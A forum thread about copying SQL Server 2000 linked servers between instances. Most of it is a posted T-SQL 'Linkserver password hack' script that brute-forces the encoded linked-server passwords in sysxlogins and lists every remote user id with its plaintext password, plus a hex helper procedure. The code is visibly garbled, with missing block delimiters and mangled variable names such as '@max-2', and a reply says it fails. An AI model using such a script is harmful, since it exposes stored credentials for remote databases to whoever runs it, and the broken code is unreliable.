Transfer linked server from one SQLserver to Another

  • Hallo Friends

    Is there any way to transfer all linked server from one SQL server to another SQL server using script.

    Best regards



  • Do you just want the server definitions and settings, or do you want all the associated remote logins as well?

  • Both definitions and settings &  associated remote logins

  • I was hoping to be able to put together a script for you, but I am not going to have the time.  In principle, all you need to do is to take the sysservers entries from your source server and copy them to sysservers on your target server.  You only want to do this for srvid != 0 (because svrid=0 is the local server), and you may need to adjust the srvid values for the other servers to accommodate other linked servers that are already defined on the target server.  Then you need to get the entries from sysoledbusers from the source to the target, adjusting for any changes you have made to values for srvid in sysservers.  If you are also looking at the older-style "remote" servers, then you'd also need to get the contents of sysremotelogins.

    Sorry I don't have a script for you, but I thought I'd at least post this so you'd know how to start.  Of course, the 'allow updates' option has to be enabled to let you update these system catalog tables in the target server's master database.  And doubly of course, you'd best have a backup of the target server's master database before you start.

    Maybe somebody else knows of a tool that can automate this - I don't see anything in DTS, but maybe there's something else.  However, I've done changes like this to my system tables on occasion, and as long as you're careful, everything should turn out fine.

    Hope this helps,


  • Hi all,

    I'm experiencing a problem on a script based copy for linked servers.

    The steps are, for each entry on remote sysservers table:

    1. Drop the linked server (and its associated logins) that has the same name name

    2. Create the linked server (using sp_addlinkedserver)

    3. Create the associated remote logins (using sp_addlinkedsrvlogin) with a blank password

    4. update the local sysxlogins to synchronise password.

    verything works fine, but I can't connect on a copied linked server (connection is OK on remote server) with an authentication failed error, although I checked passwords are the same.


    Does anybody see what's wrong with this process ?





  • This might be a little late, but might prove helpful to future searchers looking for a solution.

    You can't transfer the passwords for remote logins like you can with normal logins.  The password column the sysxlogins table is encrypted different for each server for remote logins.  Well, the password isn't encrypted, it is encoded.

    I wrote a brute-force script to decode the password for any SQL Server 2000 installation.  You have to be a system administrator for the script to work.


    John Gonyo


    SCRIPT: Linkserver password hack

    AUTHOR: John Gonyo john dot gonyo at suntust dot com

    DATE: January, 2005

    PURPOSE: This script cracks all linked server remote passwords using a simple brute-force

             algorithm using a letter dictionary. It returns all linked server userids and passwords

             as a result set.


    use master


    -- turn off all the annoying 1 row(s) affect crap until the end

    set nocount on


    -- create a sp so that the encrypt() call works

    -- The encrypt() call doesn't work unless it is called within the context of a dbo owned stored procedure!

    create procedure dbo.sp_pwdtest @passsword sysname, @result varchar(1024) output


       declare @vb varbinary(256)

       select @vb = convert(varbinary(256), encrypt(@passsword))

       exec sp_hexadecimal @vb, @result output


    -- create a temp table containing all the standard ASCII letters, some aren't easily typed,

    -- but it doesn't much matter. International versions may need to use nchar.

    create table ##result (name sysname, password sysname)

    create table ##letters (letter char(1))

    declare @C char(1)

    set @C = ' '

    while ascii(@c) <=255 begin

      insert into ##letters values (@c)

       if @@rowcount=0

         print 'WARNING: failed letter insert for ' + convert(varchar,ascii(@c))

      set @C = char(ASCII (@c) + 1)


    declare @answer varchar(1024), @found varchar(1024)

    declare @guess varchar(1024), @STR varchar(1024), @rawpassword varbinary(255)

    declare @matching int, @work varchar(1), @max-2 int, @ok int, @answermax int

    declare @userid sysname

    -- open the letter cursor

    declare letter cursor SCROLL for

       select convert(char(1),letter) from ##letters order by 1

    open letter

    -- get the password from sysxlogins

    declare passwordcursor cursor for

       select name, password from sysxlogins where sid is null and name is not null

    open passwordcursor

    fetch next from passwordcursor into @userid, @rawpassword

    while @@fetch_Status=0 begin

      -- convert the varbinary to a string

      exec sp_hexadecimal @rawpassword, @answer output

      -- setup working variables

      set @answermax = datalength(@answer)

      set @guess = ''

      set @work = ''

      set @matching = 0

      -- loop until @matching is @answer

      while @matching <> datalength(@answer) begin

        set @ok = 0

        fetch first from letter into @work

        while @@fetch_status=0 and @ok=0 begin

          set @STR = @guess + @work

          -- print 'testing ' + @STR

          exec sp_pwdtest @STR, @found output

          -- print '@found=' + @found + ' @answer=' + @answer

          set @max-2 = datalength(@found)

          if substring(@answer,@matching,@max-@matching+1) = substring(@found,@matching,@max-@matching+1) begin

             set @ok = 1

             set @guess = @STR

             set @matching = @max-2

             -- print @answer + ' ' + @found


          fetch next from letter into @work


        if @ok = 0 begin

            print 'no matches found for ' + @userid



        -- print 'Found ' + @guess


      if @ok = 0

         insert into ##result (name,password) values (@userid, '--not found!--')


         insert into ##result (name,password) values (@userid, @guess)

      -- select @userid as 'Name', @guess as 'Password Found'

      fetch next from passwordcursor into @userid, @rawpassword


    -- clean up

    close passwordcursor

    deallocate passwordcursor

    close letter

    deallocate letter

    drop table ##letters

    -- produce the result set

    set nocount off

    select * from ##result order by name

    drop table ##result


    -- drop the procedure created at the start

    drop procedure dbo.sp_pwdtest


  • Hi John,

    Is this script meant to do something useful? Doesn't look like!



  • Well, I thought I described what the script does... it "cracks" or "displays" the passwords for all of your linked server user ids.  We had some linked server ids (from our sql server to remote sql servers, ORACLE, etc) that had been in production for eons, and nobody remembered the password.  After some trial and error I created the script in my post above and it resolved the linked server user id passwords.  I think that figuring out linked server passwords is a fairly useful thing.  Probably other people would find that script useful when in a similar position, so I posted it.

    The result of all that sql is to return a list of all the linked server user ids and their associated password.  It's worked for me on all of my SQL 2000 installations...

    I did forget to put in the source for sp_hexadecimal.  I already had it on our sql servers so forgot to include it.  Here it is:

    CREATE PROCEDURE dbo.sp_hexadecimal

        @binvalue varbinary(256),

        @hexvalue varchar(256) OUTPUT


    DECLARE @charvalue varchar(256)

    DECLARE @i int

    DECLARE @length int

    DECLARE @hexstring char(16)

    SELECT @charvalue = '0x'

    SELECT @i = 1

    SELECT @length = DATALENGTH (@binvalue)

    SELECT @hexstring = '0123456789ABCDEF'

    WHILE (@i <= @length)


      DECLARE @tempint int

      DECLARE @firstint int

      DECLARE @secondint int

      SELECT @tempint = CONVERT(int, SUBSTRING(@binvalue,@i,1))

      SELECT @firstint = FLOOR(@tempint/16)

      SELECT @secondint = @tempint - (@firstint*16)

      SELECT @charvalue = @charvalue +

        SUBSTRING(@hexstring, @firstint+1, 1) +

        SUBSTRING(@hexstring, @secondint+1, 1)

      SELECT @i = @i + 1


    SELECT @hexvalue = @charvalue


  • The script doesnt work - me thinks - do u have a version that does......cheers.

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